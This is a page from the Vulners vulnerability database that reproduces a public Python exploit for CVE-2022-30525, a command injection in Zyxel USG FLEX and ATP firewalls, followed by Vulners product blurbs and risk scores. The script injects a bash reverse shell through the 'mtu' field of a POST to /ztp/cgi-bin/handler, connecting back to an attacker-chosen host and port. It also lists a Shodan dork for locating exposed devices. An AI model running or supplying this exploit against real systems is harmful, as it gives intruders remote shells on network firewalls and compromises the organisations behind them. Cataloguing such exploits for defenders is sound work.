Vulners
Lucene search
Zyxel USG FLEX 5.21 - OS Command Injection
10
# Exploit Title: Zyxel USG FLEX 5.21 - OS Command Injection
# Shodan Dork: title:"USG FLEX 100" title:"USG FLEX 100W" title:"USG FLEX 200" title:"USG FLEX 500" title:"USG FLEX 700" title:"USG20-VPN" title:"USG20W-VPN" title:"ATP 100" title:"ATP 200" title:"ATP 500" title:"ATP 700" title:"ATP 800"
# Date: May 18th 2022
# Exploit Author: Valentin Lobstein
# Vendor Homepage: https://www.zyxel.com
# Version: ZLD5.00 thru ZLD5.21
# Tested on: Linux
# CVE: CVE-2022-30525
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import sys
import json
import base64
import requests
import argparse
parser = argparse.ArgumentParser(
prog="CVE-2022-30525.py",
description="Example : python3 %(prog)s -u https://google.com -r 127.0.0.1 -p 4444",
)
parser.add_argument("-u", dest="url", help="Specify target URL")
parser.add_argument("-r", dest="host", help="Specify Remote host")
parser.add_argument("-p", dest="port", help="Specify Remote port")
args = parser.parse_args()
banner = (
"ICwtLiAuICAgLCAsLS0uICAgICAsLS4gICAsLS4gICwtLiAgLC0uICAgICAgLC0tLCAgLC0uICA7"
"LS0nICwtLiAgOy0tJyAKLyAgICB8ICAvICB8ICAgICAgICAgICApIC8gIC9cICAgICkgICAgKSAg"
"ICAgICAvICAvICAvXCB8ICAgICAgICkgfCAgICAKfCAgICB8IC8gICB8LSAgIC0tLSAgIC8gIHwg"
"LyB8ICAgLyAgICAvICAtLS0gIGAuICB8IC8gfCBgLS4gICAgLyAgYC0uICAKXCAgICB8LyAgICB8"
"ICAgICAgICAgLyAgIFwvICAvICAvICAgIC8gICAgICAgICAgKSBcLyAgLyAgICApICAvICAgICAg"
"KSAKIGAtJyAnICAgICBgLS0nICAgICAnLS0nICBgLScgICctLScgJy0tJyAgICAgYC0nICAgYC0n"
"ICBgLScgICctLScgYC0nICAKCVJldnNoZWxscwkoQ3JlYXRlZCBCeSBWYWxlbnRpbiBMb2JzdGVp"
"biA6KSApCg=="
)
def main():
print("\n" + base64.b64decode(banner).decode("utf-8"))
if None in vars(args).values():
print(f"[!] Please enter all parameters !")
parser.print_help()
sys.exit()
if "http" not in args.url:
args.url = "https://" + args.url
args.url += "/ztp/cgi-bin/handler"
exploit(args.url, args.host, args.port)
def exploit(url, host, port):
headers = {
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0",
"Content-Type": "application/json",
}
data = {
"command": "setWanPortSt",
"proto": "dhcp",
"port": "4",
"vlan_tagged": "1",
"vlanid": "5",
"mtu": f'; bash -c "exec bash -i &>/dev/tcp/{host}/{port}<&1;";',
"data": "hi",
}
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
print(f"\n[!] Trying to exploit {args.url.replace('/ztp/cgi-bin/handler','')}")
try:
response = requests.post(
url=url, headers=headers, data=json.dumps(data), verify=False, timeout=5
)
except (KeyboardInterrupt, requests.exceptions.Timeout):
print("[!] Bye Bye hekcer !")
sys.exit(1)
finally:
try:
print("[!] Can't exploit the target ! Code :", response.status_code)
except:
print("[!] Enjoy your shell !!!")
if __name__ == "__main__":
main()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Jun 2022 00:00Current
9.8High risk
Vulners AI Score9.8
CVSS 3.19.8
CVSS 210
EPSS0.94445
SSVC